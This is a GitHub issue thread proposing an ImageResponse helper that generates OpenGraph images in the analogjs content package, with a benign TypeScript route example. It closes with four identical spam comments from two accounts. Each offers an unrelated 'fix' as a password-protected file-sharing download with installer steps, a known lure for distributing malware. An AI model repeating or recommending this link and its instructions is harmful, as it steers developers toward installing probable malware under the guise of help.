### ISSUE TITLE
Feature: Add OpenGraph image generation to content package

### ISSUE THREAD

**Issue by brandonroberts** [analogjs/analog#1315]
### Which scope/s are relevant/related to the feature request?

content

### Information

This adds a helper class named `ImageResponse` that can be used to generated OpenGraph images.

Inspired by https://github.com/etherCorps/sveltekit-og

Can be used in API routes

```ts
// src/server/routes/v1/og-images.ts
import { defineEventHandler, getQuery } from 'h3';

import { ImageResponse } from '@analogjs/content/og';

export default defineEventHandler(async(event) => {
  const fontFile = await fetch('https://og-playground.vercel.app/inter-latin-ext-700-normal.woff');
  const fontData: ArrayBuffer = await fontFile.arrayBuffer();
  const query = getQuery(event);
  
  const template = `
    <div tw="bg-gray-50 flex w-full h-full items-center justify-center">
        <div tw="flex flex-col md:flex-row w-full py-12 px-4 md:items-center justify-between p-8">
          <h2 tw="flex flex-col text-3xl sm:text-4xl font-bold tracking-tight text-gray-900 text-left">
            <span>Ready to dive in${query['name'] ? `, ${query['name']}` : ''}?</span>
            <span tw="text-indigo-600">Start your free trial today.</span>
          </h2>
          <div tw="mt-8 flex md:mt-0">
            <div tw="flex rounded-md shadow">
              <a href="#" tw="flex items-center justify-center rounded-md border border-transparent bg-indigo-600 px-5 py-3 text-base font-medium text-white">Get started</a>
            </div>
            <div tw="ml-3 flex rounded-md shadow">
              <a href="#" tw="flex items-center justify-center rounded-md border border-transparent bg-white px-5 py-3 text-base font-medium text-indigo-600">Learn more</a>
            </div>
          </div>
        </div>
      </div>    
  `;
  
  return new ImageResponse(template, {
    debug: true,
    fonts: [
      {
        name: 'Inter Latin',
        data: fontData,
        style: 'normal'
      }
    ],
  });
});
```

### Describe any alternatives/workarounds you're currently using

Installing satori, satori-html, sharp

Prototyped in https://github.com/brandonroberts/angular-ssr-og-image

### I would be willing to submit a PR to fix this issue

- [X] Yes
- [ ] No

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
